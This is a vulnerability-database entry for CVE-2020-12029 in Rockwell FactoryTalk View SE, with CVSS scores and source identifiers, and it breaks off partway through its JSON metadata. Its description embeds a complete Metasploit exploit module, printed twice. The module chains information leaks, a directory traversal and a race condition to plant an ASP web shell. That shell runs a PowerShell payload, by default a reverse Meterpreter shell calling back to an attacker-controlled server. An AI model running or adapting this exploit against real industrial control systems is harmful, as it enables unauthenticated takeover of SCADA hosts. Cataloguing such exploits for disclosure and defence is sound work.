var-202007-0195
Vulnerability from variot
All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 – Patch Roll-up for CPR9 SRx. FactoryTalk View SE There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation FactoryTalk View SE. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of project files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) super( update_info( info, 'Name' => 'Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution on the Rockwell FactoryTalk View SE SCADA product as the IIS user. The attack relies on the chaining of five separate vulnerabilities. In order to achieve full remote code execution on all targets, two information leak vulnerabilities are also abused. This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro ', # Vulnerability discovery and Metasploit module 'Radek Domanski ' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'], [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'], [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'], [ 'CVE', '2020-12027'], [ 'CVE', '2020-12028'], [ 'CVE', '2020-12029'], [ 'ZDI', '20-727'], [ 'ZDI', '20-728'], [ 'ZDI', '20-729'], [ 'ZDI', '20-730'], ], 'Privileged' => false, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } }, 'DefaultOptions' => { 'WfsDelay' => 20 }, 'Targets' => [ [ 'Rockwell Automation FactoryTalk SE', {} ] ], 'DisclosureDate' => '2020-06-22', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(80), OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']), OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]), OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/']) ] )
register_advanced_options(
[
OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]),
]
)
end
def send_to_factory(path) send_request_cgi({ 'uri' => normalize_uri(target_uri, path), 'method' => 'GET' }) end
def check res = send_to_factory('/hmi_isapi.dll') return Exploit::CheckCode::Safe unless res && res.code == 200
# Parse version from response body
# Example: Version 11.00.00.230
version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')
# Is returned version sound?
unless version.empty?
if version.length != 4
return Exploit::CheckCode::Detected
end
print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}")
if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230
# we know this exact version is vulnerable (11.00.00.230)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Unknown
end
def on_request_uri(cli, request) if request.uri.include?(@shelly) print_good("#{peer} - Target connected, sending payload") psh = cmd_psh_payload( payload.encoded, payload.arch.first # without comspec it seems to fail, so keep it this way # remove_comspec: true ) # add double quotes for classic ASP escaping psh.gsub!('"', '""')
# NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell
# This is because the MSF ASP payload uses WScript.Shell.run(), which doesn't seem to work anymore...
# If this module is not working on an older Windows version, try the below as payload:
# payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe)
payload = %{<%CreateObject("WScript.Shell").exec("#{psh}")%>}
send_response(cli, payload)
# payload file is deleted automatically by the server once we win the race!
elsif request.uri.include?(@proj_name)
# Directory traversal: vulnerable asp file will land in the path we provide
print_good("#{peer} - Target connected, sending file path with dir traversal")
# Check the comments in the Infoleak 2 (project installation path) to understand why
filename = "../SE/HMI Projects/#{@shelly}"
send_response(cli, filename)
end
end
def exploit # Infoleak 1 (project listing) print_status("#{peer} - Listing projects on the server") res = send_to_factory('/hmi_isapi.dll?GetHMIProjects')
fail_with(Failure::UnexpectedReply, 'Failed to obtain project list. Bailing') unless
res && res.code == 200 && res.body.include?('HMIProject')
print_status("#{peer} - Received list of projects from the server")
@proj_name = nil
proj_path = ''
xml = res.get_xml_document
# Parse XML project list and check each project for installation project path
xml.search('HMIProject').each do |project|
# Infoleak 2 (project installation path)
# In the original exploit, we used this to calculate the directory traversal path, but
# Google says the path is the same for all versions since at least 2007.
# Let's still abuse it to check if the project is valid.
url = "/hmi_isapi.dll?GetHMIProjectPath&#{project.attributes['Name']}"
res = send_to_factory(url)
proj_path = res.body.strip
# Check if response contains :\ that indicates a windows path
next unless proj_path.include?(':\\')
print_status("#{peer} - Found project path: #{proj_path}")
# We only need first hit so we can quit the project parsing once we get it
if project.attributes['Name']
@proj_name = project.attributes['Name']
break
end
end
if !@proj_name
fail_with(Failure::UnexpectedReply, 'Failed to get a path from the XML to drop our shell, bailing out...')
end
shell_path = proj_path.sub(@proj_name, '').strip
print_good("#{peer} - Got a path to drop our shell: #{shell_path}")
# Start http server for project copy callback
http_service = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
print_status("#{peer} - Starting up our web service on #{http_service} ...")
start_service({ 'Uri' => {
'Proc' => proc do |cli, req|
on_request_uri(cli, req)
end,
# This path has to be capitalized as "RSViewSE" or else the exploit will fail!
'Path' => '/RSViewSE/'
} })
# Race Condition
# This is the racer thread. It will continuously access our asp file until it gets executed
print_status("#{peer} - Starting racer thread, let's win this race condition!")
@shelly = "#{rand_text_alpha(5..10)}.asp"
racer = Thread.new do
loop do
res = send_to_factory("/#{@shelly}")
if res.code == 200
print_good("#{peer} - We've won the race condition, shell incoming!")
break
end
end
end
# Project Copy Request: target will connect to us to obtain project information.
print_status("#{peer} - Initiating project copy request...")
url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1"
res = send_to_factory(url)
# wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish
count = 0
while count < datastore['SLEEP_RACER']
break if racer.status == false
sleep(1)
count += 1
end
racer.exit
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202007-0195",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "factorytalk view",
"scope": "eq",
"trust": 1.0,
"vendor": "rockwellautomation",
"version": null
},
{
"model": "factorytalk view",
"scope": "eq",
"trust": 0.8,
"vendor": "rockwell automation",
"version": "se"
},
{
"model": "factorytalk view se",
"scope": null,
"trust": 0.7,
"vendor": "rockwell automation",
"version": null
},
{
"model": "automation factorytalk view se",
"scope": null,
"trust": 0.6,
"vendor": "rockwell",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-730"
},
{
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"db": "NVD",
"id": "CVE-2020-12029"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:rockwellautomation:factorytalk_view",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Team FLASHBACK: Pedro Ribeiro (pedrib@gmail.com|@pedrib1337) and Radek Domanski (@RabbitPro)",
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-730"
}
],
"trust": 0.7
},
"cve": "CVE-2020-12029",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-12029",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-008257",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2020-38691",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-164666",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2020-12029",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "ics-cert@hq.dhs.gov",
"availabilityImpact": "NONE",
"baseScore": 9.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.5,
"id": "CVE-2020-12029",
"impactScore": 5.8,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-008257",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2020-12029",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-12029",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "ics-cert@hq.dhs.gov",
"id": "CVE-2020-12029",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2020-008257",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2020-12029",
"trust": 0.7,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2020-38691",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202006-1224",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-164666",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-12029",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-730"
},
{
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"db": "VULHUB",
"id": "VHN-164666"
},
{
"db": "VULMON",
"id": "CVE-2020-12029"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1224"
},
{
"db": "NVD",
"id": "CVE-2020-12029"
},
{
"db": "NVD",
"id": "CVE-2020-12029"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx. FactoryTalk View SE There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation FactoryTalk View SE. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of project files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution\n on the Rockwell FactoryTalk View SE SCADA product as the IIS user. \n The attack relies on the chaining of five separate vulnerabilities. In order to achieve full remote code execution on all\n targets, two information leak vulnerabilities are also abused. \n This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. \n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e\n [\n \u0027Pedro Ribeiro \u003cpedrib[at]gmail.com\u003e\u0027, # Vulnerability discovery and Metasploit module\n \u0027Radek Domanski \u003cradek.domanski[at]gmail.com\u003e\u0027 # Vulnerability discovery and Metasploit module\n ],\n \u0027References\u0027 =\u003e\n [\n [ \u0027URL\u0027, \u0027https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami\u0027],\n [ \u0027URL\u0027, \u0027https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md\u0027],\n [ \u0027URL\u0027, \u0027https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md\u0027],\n [ \u0027CVE\u0027, \u00272020-12027\u0027],\n [ \u0027CVE\u0027, \u00272020-12028\u0027],\n [ \u0027CVE\u0027, \u00272020-12029\u0027],\n [ \u0027ZDI\u0027, \u002720-727\u0027],\n [ \u0027ZDI\u0027, \u002720-728\u0027],\n [ \u0027ZDI\u0027, \u002720-729\u0027],\n [ \u0027ZDI\u0027, \u002720-730\u0027],\n ],\n \u0027Privileged\u0027 =\u003e false,\n \u0027Platform\u0027 =\u003e \u0027win\u0027,\n \u0027Arch\u0027 =\u003e [ARCH_X86, ARCH_X64],\n \u0027Stance\u0027 =\u003e Msf::Exploit::Stance::Aggressive,\n \u0027Payload\u0027 =\u003e {\n \u0027DefaultOptions\u0027 =\u003e\n {\n \u0027PAYLOAD\u0027 =\u003e \u0027windows/meterpreter/reverse_tcp\u0027\n }\n },\n \u0027DefaultOptions\u0027 =\u003e { \u0027WfsDelay\u0027 =\u003e 20 },\n \u0027Targets\u0027 =\u003e\n [\n [ \u0027Rockwell Automation FactoryTalk SE\u0027, {} ]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272020-06-22\u0027,\n \u0027DefaultTarget\u0027 =\u003e 0\n )\n )\n register_options(\n [\n Opt::RPORT(80),\n OptString.new(\u0027SRVHOST\u0027, [true, \u0027IP address of the host serving the exploit\u0027]),\n OptInt.new(\u0027SRVPORT\u0027, [true, \u0027Port of the host serving the exploit on\u0027, 8080]),\n OptString.new(\u0027TARGETURI\u0027, [true, \u0027The base path to Rockwell FactoryTalk\u0027, \u0027/rsviewse/\u0027])\n ]\n )\n\n register_advanced_options(\n [\n OptInt.new(\u0027SLEEP_RACER\u0027, [true, \u0027Number of seconds to wait for racer thread to finish\u0027, 15]),\n ]\n )\n end\n\n def send_to_factory(path)\n send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri, path),\n \u0027method\u0027 =\u003e \u0027GET\u0027\n })\n end\n\n def check\n res = send_to_factory(\u0027/hmi_isapi.dll\u0027)\n return Exploit::CheckCode::Safe unless res \u0026\u0026 res.code == 200\n\n # Parse version from response body\n # Example: Version 11.00.00.230\n version = res.body.scan(/Version ([0-9\\.]{5,})/).flatten.first.to_s.split(\u0027.\u0027)\n\n # Is returned version sound?\n unless version.empty?\n if version.length != 4\n return Exploit::CheckCode::Detected\n end\n\n print_status(\"#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join(\u0027.\u0027)}\")\n if version[0].to_i == 11 \u0026\u0026 version[1].to_i == 0 \u0026\u0026 version[2].to_i == 0 \u0026\u0026 version[3].to_i == 230\n # we know this exact version is vulnerable (11.00.00.230)\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Unknown\n end\n\n def on_request_uri(cli, request)\n if request.uri.include?(@shelly)\n print_good(\"#{peer} - Target connected, sending payload\")\n psh = cmd_psh_payload(\n payload.encoded,\n payload.arch.first\n # without comspec it seems to fail, so keep it this way\n # remove_comspec: true\n )\n # add double quotes for classic ASP escaping\n psh.gsub!(\u0027\"\u0027, \u0027\"\"\u0027)\n\n # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell\n # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn\u0027t seem to work anymore... \n # If this module is not working on an older Windows version, try the below as payload:\n # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe)\n payload = %{\u003c%CreateObject(\"WScript.Shell\").exec(\"#{psh}\")%\u003e}\n send_response(cli, payload)\n # payload file is deleted automatically by the server once we win the race!\n\n elsif request.uri.include?(@proj_name)\n # Directory traversal: vulnerable asp file will land in the path we provide\n print_good(\"#{peer} - Target connected, sending file path with dir traversal\")\n # Check the comments in the Infoleak 2 (project installation path) to understand why\n filename = \"../SE/HMI Projects/#{@shelly}\"\n send_response(cli, filename)\n end\n end\n\n def exploit\n # Infoleak 1 (project listing)\n print_status(\"#{peer} - Listing projects on the server\")\n res = send_to_factory(\u0027/hmi_isapi.dll?GetHMIProjects\u0027)\n\n fail_with(Failure::UnexpectedReply, \u0027Failed to obtain project list. Bailing\u0027) unless\n res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027HMIProject\u0027)\n\n print_status(\"#{peer} - Received list of projects from the server\")\n @proj_name = nil\n proj_path = \u0027\u0027\n xml = res.get_xml_document\n\n # Parse XML project list and check each project for installation project path\n xml.search(\u0027HMIProject\u0027).each do |project|\n # Infoleak 2 (project installation path)\n # In the original exploit, we used this to calculate the directory traversal path, but\n # Google says the path is the same for all versions since at least 2007. \n # Let\u0027s still abuse it to check if the project is valid. \n url = \"/hmi_isapi.dll?GetHMIProjectPath\u0026#{project.attributes[\u0027Name\u0027]}\"\n res = send_to_factory(url)\n\n proj_path = res.body.strip\n\n # Check if response contains :\\ that indicates a windows path\n next unless proj_path.include?(\u0027:\\\\\u0027)\n\n print_status(\"#{peer} - Found project path: #{proj_path}\")\n\n # We only need first hit so we can quit the project parsing once we get it\n if project.attributes[\u0027Name\u0027]\n @proj_name = project.attributes[\u0027Name\u0027]\n break\n end\n end\n\n if !@proj_name\n fail_with(Failure::UnexpectedReply, \u0027Failed to get a path from the XML to drop our shell, bailing out...\u0027)\n end\n\n shell_path = proj_path.sub(@proj_name, \u0027\u0027).strip\n print_good(\"#{peer} - Got a path to drop our shell: #{shell_path}\")\n\n # Start http server for project copy callback\n http_service = \u0027http://\u0027 + datastore[\u0027SRVHOST\u0027] + \u0027:\u0027 + datastore[\u0027SRVPORT\u0027].to_s\n print_status(\"#{peer} - Starting up our web service on #{http_service} ...\")\n\n start_service({ \u0027Uri\u0027 =\u003e {\n \u0027Proc\u0027 =\u003e proc do |cli, req|\n on_request_uri(cli, req)\n end,\n # This path has to be capitalized as \"RSViewSE\" or else the exploit will fail!\n \u0027Path\u0027 =\u003e \u0027/RSViewSE/\u0027\n } })\n\n # Race Condition\n # This is the racer thread. It will continuously access our asp file until it gets executed\n print_status(\"#{peer} - Starting racer thread, let\u0027s win this race condition!\")\n @shelly = \"#{rand_text_alpha(5..10)}.asp\"\n racer = Thread.new do\n loop do\n res = send_to_factory(\"/#{@shelly}\")\n if res.code == 200\n print_good(\"#{peer} - We\u0027ve won the race condition, shell incoming!\")\n break\n end\n end\n end\n\n # Project Copy Request: target will connect to us to obtain project information. \n print_status(\"#{peer} - Initiating project copy request...\")\n url = \"/hmi_isapi.dll?StartRemoteProjectCopy\u0026#{@proj_name}\u0026#{rand_text_alpha(5..13)}\u0026#{datastore[\u0027SRVHOST\u0027]}:#{datastore[\u0027SRVPORT\u0027]}\u00261\"\n res = send_to_factory(url)\n\n # wait up to datastore[\u0027SLEEP_RACER\u0027] seconds for the racer thread to finish\n count = 0\n while count \u003c datastore[\u0027SLEEP_RACER\u0027]\n break if racer.status == false\n\n sleep(1)\n count += 1\n end\n racer.exit\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12029"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"db": "ZDI",
"id": "ZDI-20-730"
},
{
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"db": "VULHUB",
"id": "VHN-164666"
},
{
"db": "VULMON",
"id": "CVE-2020-12029"
},
{
"db": "PACKETSTORM",
"id": "160156"
}
],
"trust": 3.06
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-164666",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164666"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-12029",
"trust": 4.0
},
{
"db": "ICS CERT",
"id": "ICSA-20-170-05",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "160156",
"trust": 1.9
},
{
"db": "ZDI",
"id": "ZDI-20-730",
"trust": 1.3
},
{
"db": "JVN",
"id": "JVNVU97172119",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008257",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-10284",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2020-38691",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1224",
"trust": 0.7
},
{
"db": "NSFOCUS",
"id": "47659",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-164666",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-12029",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-20-730"
},
{
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"db": "VULHUB",
"id": "VHN-164666"
},
{
"db": "VULMON",
"id": "CVE-2020-12029"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008257"
},
{
"db": "PACKETSTORM",
"id": "160156"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1224"
},
{
"db": "NVD",
"id": "CVE-2020-12029"
}
]
},
"id": "VAR-202007-0195",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-38691"
},
{
"db": "VULHUB",
"id": "VHN-164666"
}
],
"trust": 1.46428574
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-38691"
}
]
},
"last_update_date": "2024-11-23T21:59:09.803000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
